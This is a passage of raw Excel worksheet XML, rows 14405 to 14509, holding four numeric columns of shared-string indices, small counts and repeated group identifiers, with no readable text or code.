      <c r="A14405" t="s">
        <v>16224</v>
      </c>
      <c r="B14405" t="s">
        <v>16224</v>
      </c>
      <c r="C14405">
        <v>0</v>
      </c>
      <c r="D14405">
        <v>5172</v>
      </c>
    </row>
    <row r="14406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14406" t="s">
        <v>16228</v>
      </c>
      <c r="B14406" t="s">
        <v>16215</v>
      </c>
      <c r="C14406">
        <v>6</v>
      </c>
      <c r="D14406">
        <v>5118</v>
      </c>
    </row>
    <row r="14407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14407" t="s">
        <v>16231</v>
      </c>
      <c r="B14407" t="s">
        <v>16216</v>
      </c>
      <c r="C14407">
        <v>2</v>
      </c>
      <c r="D14407">
        <v>5118</v>
      </c>
    </row>
    <row r="14408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14408" t="s">
        <v>16228</v>
      </c>
      <c r="B14408" t="s">
        <v>16217</v>
      </c>
      <c r="C14408">
        <v>0</v>
      </c>
      <c r="D14408">
        <v>5118</v>
      </c>
    </row>
    <row r="14409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14409" t="s">
        <v>16231</v>
      </c>
      <c r="B14409" t="s">
        <v>16218</v>
      </c>
      <c r="C14409">
        <v>0</v>
      </c>
      <c r="D14409">
        <v>5118</v>
      </c>
    </row>
    <row r="14410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14410" t="s">
        <v>16229</v>
      </c>
      <c r="B14410" t="s">
        <v>16221</v>
      </c>
      <c r="C14410">
        <v>3</v>
      </c>
      <c r="D14410">
        <v>5118</v>
      </c>
    </row>
    <row r="14411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14411" t="s">
        <v>16230</v>
      </c>
      <c r="B14411" t="s">
        <v>16222</v>
      </c>
      <c r="C14411">
        <v>0</v>
      </c>
      <c r="D14411">
        <v>5118</v>
      </c>
    </row>
    <row r="14412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14412" t="s">
        <v>16223</v>
      </c>
      <c r="B14412" t="s">
        <v>16223</v>
      </c>
      <c r="C14412">
        <v>6</v>
      </c>
      <c r="D14412">
        <v>5118</v>
      </c>
    </row>
    <row r="14413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14413" t="s">
        <v>16228</v>
      </c>
      <c r="B14413" t="s">
        <v>16211</v>
      </c>
      <c r="C14413">
        <v>0</v>
      </c>
      <c r="D14413">
        <v>5190</v>
      </c>
    </row>
    <row r="14414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14414" t="s">
        <v>16231</v>
      </c>
      <c r="B14414" t="s">
        <v>16212</v>
      </c>
      <c r="C14414">
        <v>0</v>
      </c>
      <c r="D14414">
        <v>5190</v>
      </c>
    </row>
    <row r="14415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14415" t="s">
        <v>16228</v>
      </c>
      <c r="B14415" t="s">
        <v>16213</v>
      </c>
      <c r="C14415">
        <v>0</v>
      </c>
      <c r="D14415">
        <v>5190</v>
      </c>
    </row>
    <row r="14416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14416" t="s">
        <v>16231</v>
      </c>
      <c r="B14416" t="s">
        <v>16214</v>
      </c>
      <c r="C14416">
        <v>0</v>
      </c>
      <c r="D14416">
        <v>5190</v>
      </c>
    </row>
    <row r="14417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14417" t="s">
        <v>16228</v>
      </c>
      <c r="B14417" t="s">
        <v>16215</v>
      </c>
      <c r="C14417">
        <v>0</v>
      </c>
      <c r="D14417">
        <v>5190</v>
      </c>
    </row>
    <row r="14418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14418" t="s">
        <v>16231</v>
      </c>
      <c r="B14418" t="s">
        <v>16216</v>
      </c>
      <c r="C14418">
        <v>2</v>
      </c>
      <c r="D14418">
        <v>5190</v>
      </c>
    </row>
    <row r="14419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14419" t="s">
        <v>16228</v>
      </c>
      <c r="B14419" t="s">
        <v>16217</v>
      </c>
      <c r="C14419">
        <v>10</v>
      </c>
      <c r="D14419">
        <v>5190</v>
      </c>
    </row>
    <row r="14420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14420" t="s">
        <v>16231</v>
      </c>
      <c r="B14420" t="s">
        <v>16218</v>
      </c>
      <c r="C14420">
        <v>0</v>
      </c>
      <c r="D14420">
        <v>5190</v>
      </c>
    </row>
    <row r="14421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14421" t="s">
        <v>16229</v>
      </c>
      <c r="B14421" t="s">
        <v>16219</v>
      </c>
      <c r="C14421">
        <v>0</v>
      </c>
      <c r="D14421">
        <v>5190</v>
      </c>
    </row>
    <row r="14422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14422" t="s">
        <v>16230</v>
      </c>
      <c r="B14422" t="s">
        <v>16220</v>
      </c>
      <c r="C14422">
        <v>0</v>
      </c>
      <c r="D14422">
        <v>5190</v>
      </c>
    </row>
    <row r="14423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14423" t="s">
        <v>16229</v>
      </c>
      <c r="B14423" t="s">
        <v>16221</v>
      </c>
      <c r="C14423">
        <v>3</v>
      </c>
      <c r="D14423">
        <v>5190</v>
      </c>
    </row>
    <row r="14424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14424" t="s">
        <v>16230</v>
      </c>
      <c r="B14424" t="s">
        <v>16222</v>
      </c>
      <c r="C14424">
        <v>2</v>
      </c>
      <c r="D14424">
        <v>5190</v>
      </c>
    </row>
    <row r="14425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14425" t="s">
        <v>16223</v>
      </c>
      <c r="B14425" t="s">
        <v>16223</v>
      </c>
      <c r="C14425">
        <v>26</v>
      </c>
      <c r="D14425">
        <v>5190</v>
      </c>
    </row>
    <row r="14426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14426" t="s">
        <v>16224</v>
      </c>
      <c r="B14426" t="s">
        <v>16224</v>
      </c>
      <c r="C14426">
        <v>1</v>
      </c>
      <c r="D14426">
        <v>5190</v>
      </c>
    </row>
    <row r="14427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14427" t="s">
        <v>16228</v>
      </c>
      <c r="B14427" t="s">
        <v>16211</v>
      </c>
      <c r="C14427">
        <v>0</v>
      </c>
      <c r="D14427">
        <v>1302</v>
      </c>
    </row>
    <row r="14428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14428" t="s">
        <v>16231</v>
      </c>
      <c r="B14428" t="s">
        <v>16212</v>
      </c>
      <c r="C14428">
        <v>0</v>
      </c>
      <c r="D14428">
        <v>1302</v>
      </c>
    </row>
    <row r="14429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14429" t="s">
        <v>16228</v>
      </c>
      <c r="B14429" t="s">
        <v>16213</v>
      </c>
      <c r="C14429">
        <v>0</v>
      </c>
      <c r="D14429">
        <v>1302</v>
      </c>
    </row>
    <row r="14430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14430" t="s">
        <v>16231</v>
      </c>
      <c r="B14430" t="s">
        <v>16214</v>
      </c>
      <c r="C14430">
        <v>0</v>
      </c>
      <c r="D14430">
        <v>1302</v>
      </c>
    </row>
    <row r="14431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14431" t="s">
        <v>16228</v>
      </c>
      <c r="B14431" t="s">
        <v>16215</v>
      </c>
      <c r="C14431">
        <v>0</v>
      </c>
      <c r="D14431">
        <v>1302</v>
      </c>
    </row>
    <row r="14432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14432" t="s">
        <v>16231</v>
      </c>
      <c r="B14432" t="s">
        <v>16216</v>
      </c>
      <c r="C14432">
        <v>5</v>
      </c>
      <c r="D14432">
        <v>1302</v>
      </c>
    </row>
    <row r="14433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14433" t="s">
        <v>16228</v>
      </c>
      <c r="B14433" t="s">
        <v>16217</v>
      </c>
      <c r="C14433">
        <v>0</v>
      </c>
      <c r="D14433">
        <v>1302</v>
      </c>
    </row>
    <row r="14434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14434" t="s">
        <v>16231</v>
      </c>
      <c r="B14434" t="s">
        <v>16218</v>
      </c>
      <c r="C14434">
        <v>0</v>
      </c>
      <c r="D14434">
        <v>1302</v>
      </c>
    </row>
    <row r="14435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14435" t="s">
        <v>16229</v>
      </c>
      <c r="B14435" t="s">
        <v>16219</v>
      </c>
      <c r="C14435">
        <v>0</v>
      </c>
      <c r="D14435">
        <v>1302</v>
      </c>
    </row>
    <row r="14436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14436" t="s">
        <v>16230</v>
      </c>
      <c r="B14436" t="s">
        <v>16220</v>
      </c>
      <c r="C14436">
        <v>0</v>
      </c>
      <c r="D14436">
        <v>1302</v>
      </c>
    </row>
    <row r="14437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14437" t="s">
        <v>16229</v>
      </c>
      <c r="B14437" t="s">
        <v>16221</v>
      </c>
      <c r="C14437">
        <v>0</v>
      </c>
      <c r="D14437">
        <v>1302</v>
      </c>
    </row>
    <row r="14438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14438" t="s">
        <v>16230</v>
      </c>
      <c r="B14438" t="s">
        <v>16222</v>
      </c>
      <c r="C14438">
        <v>0</v>
      </c>
      <c r="D14438">
        <v>1302</v>
      </c>
    </row>
    <row r="14439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14439" t="s">
        <v>16223</v>
      </c>
      <c r="B14439" t="s">
        <v>16223</v>
      </c>
      <c r="C14439">
        <v>20</v>
      </c>
      <c r="D14439">
        <v>1302</v>
      </c>
    </row>
    <row r="14440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14440" t="s">
        <v>16224</v>
      </c>
      <c r="B14440" t="s">
        <v>16224</v>
      </c>
      <c r="C14440">
        <v>0</v>
      </c>
      <c r="D14440">
        <v>1302</v>
      </c>
    </row>
    <row r="14441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14441" t="s">
        <v>16228</v>
      </c>
      <c r="B14441" t="s">
        <v>16211</v>
      </c>
      <c r="C14441">
        <v>0</v>
      </c>
      <c r="D14441">
        <v>1321</v>
      </c>
    </row>
    <row r="14442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14442" t="s">
        <v>16231</v>
      </c>
      <c r="B14442" t="s">
        <v>16212</v>
      </c>
      <c r="C14442">
        <v>0</v>
      </c>
      <c r="D14442">
        <v>1321</v>
      </c>
    </row>
    <row r="14443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14443" t="s">
        <v>16228</v>
      </c>
      <c r="B14443" t="s">
        <v>16213</v>
      </c>
      <c r="C14443">
        <v>0</v>
      </c>
      <c r="D14443">
        <v>1321</v>
      </c>
    </row>
    <row r="14444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14444" t="s">
        <v>16231</v>
      </c>
      <c r="B14444" t="s">
        <v>16214</v>
      </c>
      <c r="C14444">
        <v>0</v>
      </c>
      <c r="D14444">
        <v>1321</v>
      </c>
    </row>
    <row r="14445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14445" t="s">
        <v>16228</v>
      </c>
      <c r="B14445" t="s">
        <v>16215</v>
      </c>
      <c r="C14445">
        <v>1</v>
      </c>
      <c r="D14445">
        <v>1321</v>
      </c>
    </row>
    <row r="14446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14446" t="s">
        <v>16231</v>
      </c>
      <c r="B14446" t="s">
        <v>16216</v>
      </c>
      <c r="C14446">
        <v>3</v>
      </c>
      <c r="D14446">
        <v>1321</v>
      </c>
    </row>
    <row r="14447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14447" t="s">
        <v>16228</v>
      </c>
      <c r="B14447" t="s">
        <v>16217</v>
      </c>
      <c r="C14447">
        <v>6</v>
      </c>
      <c r="D14447">
        <v>1321</v>
      </c>
    </row>
    <row r="14448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14448" t="s">
        <v>16231</v>
      </c>
      <c r="B14448" t="s">
        <v>16218</v>
      </c>
      <c r="C14448">
        <v>1</v>
      </c>
      <c r="D14448">
        <v>1321</v>
      </c>
    </row>
    <row r="14449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14449" t="s">
        <v>16229</v>
      </c>
      <c r="B14449" t="s">
        <v>16219</v>
      </c>
      <c r="C14449">
        <v>0</v>
      </c>
      <c r="D14449">
        <v>1321</v>
      </c>
    </row>
    <row r="14450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14450" t="s">
        <v>16230</v>
      </c>
      <c r="B14450" t="s">
        <v>16220</v>
      </c>
      <c r="C14450">
        <v>0</v>
      </c>
      <c r="D14450">
        <v>1321</v>
      </c>
    </row>
    <row r="14451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14451" t="s">
        <v>16229</v>
      </c>
      <c r="B14451" t="s">
        <v>16221</v>
      </c>
      <c r="C14451">
        <v>4</v>
      </c>
      <c r="D14451">
        <v>1321</v>
      </c>
    </row>
    <row r="14452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14452" t="s">
        <v>16230</v>
      </c>
      <c r="B14452" t="s">
        <v>16222</v>
      </c>
      <c r="C14452">
        <v>2</v>
      </c>
      <c r="D14452">
        <v>1321</v>
      </c>
    </row>
    <row r="14453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14453" t="s">
        <v>16223</v>
      </c>
      <c r="B14453" t="s">
        <v>16223</v>
      </c>
      <c r="C14453">
        <v>24</v>
      </c>
      <c r="D14453">
        <v>1321</v>
      </c>
    </row>
    <row r="14454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14454" t="s">
        <v>16224</v>
      </c>
      <c r="B14454" t="s">
        <v>16224</v>
      </c>
      <c r="C14454">
        <v>0</v>
      </c>
      <c r="D14454">
        <v>1321</v>
      </c>
    </row>
    <row r="14455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14455" t="s">
        <v>16228</v>
      </c>
      <c r="B14455" t="s">
        <v>16215</v>
      </c>
      <c r="C14455">
        <v>3</v>
      </c>
      <c r="D14455">
        <v>1321</v>
      </c>
    </row>
    <row r="14456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14456" t="s">
        <v>16231</v>
      </c>
      <c r="B14456" t="s">
        <v>16216</v>
      </c>
      <c r="C14456">
        <v>6</v>
      </c>
      <c r="D14456">
        <v>1321</v>
      </c>
    </row>
    <row r="14457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14457" t="s">
        <v>16229</v>
      </c>
      <c r="B14457" t="s">
        <v>16221</v>
      </c>
      <c r="C14457">
        <v>0</v>
      </c>
      <c r="D14457">
        <v>1321</v>
      </c>
    </row>
    <row r="14458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14458" t="s">
        <v>16230</v>
      </c>
      <c r="B14458" t="s">
        <v>16222</v>
      </c>
      <c r="C14458">
        <v>0</v>
      </c>
      <c r="D14458">
        <v>1321</v>
      </c>
    </row>
    <row r="14459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14459" t="s">
        <v>16228</v>
      </c>
      <c r="B14459" t="s">
        <v>16211</v>
      </c>
      <c r="C14459">
        <v>0</v>
      </c>
      <c r="D14459">
        <v>2580</v>
      </c>
    </row>
    <row r="14460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14460" t="s">
        <v>16231</v>
      </c>
      <c r="B14460" t="s">
        <v>16212</v>
      </c>
      <c r="C14460">
        <v>0</v>
      </c>
      <c r="D14460">
        <v>2580</v>
      </c>
    </row>
    <row r="14461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14461" t="s">
        <v>16228</v>
      </c>
      <c r="B14461" t="s">
        <v>16213</v>
      </c>
      <c r="C14461">
        <v>0</v>
      </c>
      <c r="D14461">
        <v>2580</v>
      </c>
    </row>
    <row r="14462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14462" t="s">
        <v>16231</v>
      </c>
      <c r="B14462" t="s">
        <v>16214</v>
      </c>
      <c r="C14462">
        <v>0</v>
      </c>
      <c r="D14462">
        <v>2580</v>
      </c>
    </row>
    <row r="14463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14463" t="s">
        <v>16228</v>
      </c>
      <c r="B14463" t="s">
        <v>16215</v>
      </c>
      <c r="C14463">
        <v>1</v>
      </c>
      <c r="D14463">
        <v>2580</v>
      </c>
    </row>
    <row r="14464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14464" t="s">
        <v>16231</v>
      </c>
      <c r="B14464" t="s">
        <v>16216</v>
      </c>
      <c r="C14464">
        <v>1</v>
      </c>
      <c r="D14464">
        <v>2580</v>
      </c>
    </row>
    <row r="14465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14465" t="s">
        <v>16228</v>
      </c>
      <c r="B14465" t="s">
        <v>16217</v>
      </c>
      <c r="C14465">
        <v>8</v>
      </c>
      <c r="D14465">
        <v>2580</v>
      </c>
    </row>
    <row r="14466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14466" t="s">
        <v>16231</v>
      </c>
      <c r="B14466" t="s">
        <v>16218</v>
      </c>
      <c r="C14466">
        <v>3</v>
      </c>
      <c r="D14466">
        <v>2580</v>
      </c>
    </row>
    <row r="14467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14467" t="s">
        <v>16229</v>
      </c>
      <c r="B14467" t="s">
        <v>16219</v>
      </c>
      <c r="C14467">
        <v>0</v>
      </c>
      <c r="D14467">
        <v>2580</v>
      </c>
    </row>
    <row r="14468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14468" t="s">
        <v>16230</v>
      </c>
      <c r="B14468" t="s">
        <v>16220</v>
      </c>
      <c r="C14468">
        <v>0</v>
      </c>
      <c r="D14468">
        <v>2580</v>
      </c>
    </row>
    <row r="14469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14469" t="s">
        <v>16229</v>
      </c>
      <c r="B14469" t="s">
        <v>16221</v>
      </c>
      <c r="C14469">
        <v>10</v>
      </c>
      <c r="D14469">
        <v>2580</v>
      </c>
    </row>
    <row r="14470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14470" t="s">
        <v>16230</v>
      </c>
      <c r="B14470" t="s">
        <v>16222</v>
      </c>
      <c r="C14470">
        <v>5</v>
      </c>
      <c r="D14470">
        <v>2580</v>
      </c>
    </row>
    <row r="14471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14471" t="s">
        <v>16223</v>
      </c>
      <c r="B14471" t="s">
        <v>16223</v>
      </c>
      <c r="C14471">
        <v>26</v>
      </c>
      <c r="D14471">
        <v>2580</v>
      </c>
    </row>
    <row r="14472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14472" t="s">
        <v>16224</v>
      </c>
      <c r="B14472" t="s">
        <v>16224</v>
      </c>
      <c r="C14472">
        <v>1</v>
      </c>
      <c r="D14472">
        <v>2580</v>
      </c>
    </row>
    <row r="14473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14473" t="s">
        <v>16228</v>
      </c>
      <c r="B14473" t="s">
        <v>16211</v>
      </c>
      <c r="C14473">
        <v>0</v>
      </c>
      <c r="D14473">
        <v>485</v>
      </c>
    </row>
    <row r="14474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14474" t="s">
        <v>16231</v>
      </c>
      <c r="B14474" t="s">
        <v>16212</v>
      </c>
      <c r="C14474">
        <v>0</v>
      </c>
      <c r="D14474">
        <v>485</v>
      </c>
    </row>
    <row r="14475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14475" t="s">
        <v>16228</v>
      </c>
      <c r="B14475" t="s">
        <v>16213</v>
      </c>
      <c r="C14475">
        <v>0</v>
      </c>
      <c r="D14475">
        <v>485</v>
      </c>
    </row>
    <row r="14476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14476" t="s">
        <v>16231</v>
      </c>
      <c r="B14476" t="s">
        <v>16214</v>
      </c>
      <c r="C14476">
        <v>0</v>
      </c>
      <c r="D14476">
        <v>485</v>
      </c>
    </row>
    <row r="14477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14477" t="s">
        <v>16228</v>
      </c>
      <c r="B14477" t="s">
        <v>16215</v>
      </c>
      <c r="C14477">
        <v>2</v>
      </c>
      <c r="D14477">
        <v>485</v>
      </c>
    </row>
    <row r="14478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14478" t="s">
        <v>16231</v>
      </c>
      <c r="B14478" t="s">
        <v>16216</v>
      </c>
      <c r="C14478">
        <v>1</v>
      </c>
      <c r="D14478">
        <v>485</v>
      </c>
    </row>
    <row r="14479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14479" t="s">
        <v>16228</v>
      </c>
      <c r="B14479" t="s">
        <v>16217</v>
      </c>
      <c r="C14479">
        <v>9</v>
      </c>
      <c r="D14479">
        <v>485</v>
      </c>
    </row>
    <row r="14480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14480" t="s">
        <v>16231</v>
      </c>
      <c r="B14480" t="s">
        <v>16218</v>
      </c>
      <c r="C14480">
        <v>0</v>
      </c>
      <c r="D14480">
        <v>485</v>
      </c>
    </row>
    <row r="14481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14481" t="s">
        <v>16229</v>
      </c>
      <c r="B14481" t="s">
        <v>16219</v>
      </c>
      <c r="C14481">
        <v>0</v>
      </c>
      <c r="D14481">
        <v>485</v>
      </c>
    </row>
    <row r="14482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14482" t="s">
        <v>16230</v>
      </c>
      <c r="B14482" t="s">
        <v>16220</v>
      </c>
      <c r="C14482">
        <v>0</v>
      </c>
      <c r="D14482">
        <v>485</v>
      </c>
    </row>
    <row r="14483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14483" t="s">
        <v>16229</v>
      </c>
      <c r="B14483" t="s">
        <v>16221</v>
      </c>
      <c r="C14483">
        <v>0</v>
      </c>
      <c r="D14483">
        <v>485</v>
      </c>
    </row>
    <row r="14484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14484" t="s">
        <v>16230</v>
      </c>
      <c r="B14484" t="s">
        <v>16222</v>
      </c>
      <c r="C14484">
        <v>0</v>
      </c>
      <c r="D14484">
        <v>485</v>
      </c>
    </row>
    <row r="14485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14485" t="s">
        <v>16223</v>
      </c>
      <c r="B14485" t="s">
        <v>16223</v>
      </c>
      <c r="C14485">
        <v>6</v>
      </c>
      <c r="D14485">
        <v>485</v>
      </c>
    </row>
    <row r="14486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14486" t="s">
        <v>16224</v>
      </c>
      <c r="B14486" t="s">
        <v>16224</v>
      </c>
      <c r="C14486">
        <v>0</v>
      </c>
      <c r="D14486">
        <v>485</v>
      </c>
    </row>
    <row r="14487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14487" t="s">
        <v>16228</v>
      </c>
      <c r="B14487" t="s">
        <v>16211</v>
      </c>
      <c r="C14487">
        <v>0</v>
      </c>
      <c r="D14487">
        <v>1292</v>
      </c>
    </row>
    <row r="14488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14488" t="s">
        <v>16231</v>
      </c>
      <c r="B14488" t="s">
        <v>16212</v>
      </c>
      <c r="C14488">
        <v>0</v>
      </c>
      <c r="D14488">
        <v>1292</v>
      </c>
    </row>
    <row r="14489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14489" t="s">
        <v>16228</v>
      </c>
      <c r="B14489" t="s">
        <v>16213</v>
      </c>
      <c r="C14489">
        <v>0</v>
      </c>
      <c r="D14489">
        <v>1292</v>
      </c>
    </row>
    <row r="14490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14490" t="s">
        <v>16231</v>
      </c>
      <c r="B14490" t="s">
        <v>16214</v>
      </c>
      <c r="C14490">
        <v>0</v>
      </c>
      <c r="D14490">
        <v>1292</v>
      </c>
    </row>
    <row r="14491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14491" t="s">
        <v>16228</v>
      </c>
      <c r="B14491" t="s">
        <v>16215</v>
      </c>
      <c r="C14491">
        <v>6</v>
      </c>
      <c r="D14491">
        <v>1292</v>
      </c>
    </row>
    <row r="14492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14492" t="s">
        <v>16231</v>
      </c>
      <c r="B14492" t="s">
        <v>16216</v>
      </c>
      <c r="C14492">
        <v>2</v>
      </c>
      <c r="D14492">
        <v>1292</v>
      </c>
    </row>
    <row r="14493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14493" t="s">
        <v>16228</v>
      </c>
      <c r="B14493" t="s">
        <v>16217</v>
      </c>
      <c r="C14493">
        <v>3</v>
      </c>
      <c r="D14493">
        <v>1292</v>
      </c>
    </row>
    <row r="14494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14494" t="s">
        <v>16231</v>
      </c>
      <c r="B14494" t="s">
        <v>16218</v>
      </c>
      <c r="C14494">
        <v>2</v>
      </c>
      <c r="D14494">
        <v>1292</v>
      </c>
    </row>
    <row r="14495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14495" t="s">
        <v>16229</v>
      </c>
      <c r="B14495" t="s">
        <v>16219</v>
      </c>
      <c r="C14495">
        <v>10</v>
      </c>
      <c r="D14495">
        <v>1292</v>
      </c>
    </row>
    <row r="14496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14496" t="s">
        <v>16230</v>
      </c>
      <c r="B14496" t="s">
        <v>16220</v>
      </c>
      <c r="C14496">
        <v>4</v>
      </c>
      <c r="D14496">
        <v>1292</v>
      </c>
    </row>
    <row r="14497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14497" t="s">
        <v>16229</v>
      </c>
      <c r="B14497" t="s">
        <v>16221</v>
      </c>
      <c r="C14497">
        <v>0</v>
      </c>
      <c r="D14497">
        <v>1292</v>
      </c>
    </row>
    <row r="14498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14498" t="s">
        <v>16230</v>
      </c>
      <c r="B14498" t="s">
        <v>16222</v>
      </c>
      <c r="C14498">
        <v>0</v>
      </c>
      <c r="D14498">
        <v>1292</v>
      </c>
    </row>
    <row r="14499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14499" t="s">
        <v>16223</v>
      </c>
      <c r="B14499" t="s">
        <v>16223</v>
      </c>
      <c r="C14499">
        <v>26</v>
      </c>
      <c r="D14499">
        <v>1292</v>
      </c>
    </row>
    <row r="14500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14500" t="s">
        <v>16224</v>
      </c>
      <c r="B14500" t="s">
        <v>16224</v>
      </c>
      <c r="C14500">
        <v>0</v>
      </c>
      <c r="D14500">
        <v>1292</v>
      </c>
    </row>
    <row r="14501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14501" t="s">
        <v>16228</v>
      </c>
      <c r="B14501" t="s">
        <v>16211</v>
      </c>
      <c r="C14501">
        <v>0</v>
      </c>
      <c r="D14501">
        <v>5154</v>
      </c>
    </row>
    <row r="14502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14502" t="s">
        <v>16231</v>
      </c>
      <c r="B14502" t="s">
        <v>16212</v>
      </c>
      <c r="C14502">
        <v>0</v>
      </c>
      <c r="D14502">
        <v>5154</v>
      </c>
    </row>
    <row r="14503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14503" t="s">
        <v>16228</v>
      </c>
      <c r="B14503" t="s">
        <v>16213</v>
      </c>
      <c r="C14503">
        <v>0</v>
      </c>
      <c r="D14503">
        <v>5154</v>
      </c>
    </row>
    <row r="14504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14504" t="s">
        <v>16231</v>
      </c>
      <c r="B14504" t="s">
        <v>16214</v>
      </c>
      <c r="C14504">
        <v>0</v>
      </c>
      <c r="D14504">
        <v>5154</v>
      </c>
    </row>
    <row r="14505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14505" t="s">
        <v>16228</v>
      </c>
      <c r="B14505" t="s">
        <v>16215</v>
      </c>
      <c r="C14505">
        <v>0</v>
      </c>
      <c r="D14505">
        <v>5154</v>
      </c>
    </row>
    <row r="14506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14506" t="s">
        <v>16231</v>
      </c>
      <c r="B14506" t="s">
        <v>16216</v>
      </c>
      <c r="C14506">
        <v>2</v>
      </c>
      <c r="D14506">
        <v>5154</v>
      </c>
    </row>
    <row r="14507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14507" t="s">
        <v>16228</v>
      </c>
      <c r="B14507" t="s">
        <v>16217</v>
      </c>
      <c r="C14507">
        <v>5</v>
      </c>
      <c r="D14507">
        <v>5154</v>
      </c>
    </row>
    <row r="14508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14508" t="s">
        <v>16231</v>
      </c>
      <c r="B14508" t="s">
        <v>16218</v>
      </c>
      <c r="C14508">
        <v>0</v>
      </c>
      <c r="D14508">
        <v>5154</v>
      </c>
    </row>
    <row r="14509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14509" t="s">
        <v>16229</v>
      </c>
      <c r="B14509" t="s">
        <v>16219</v>
      </c>
      <c r="C14509">
        <v>0</v>
      </c>
      <c r="D14509">
        <v>5154</v>
      </c>
    </row>
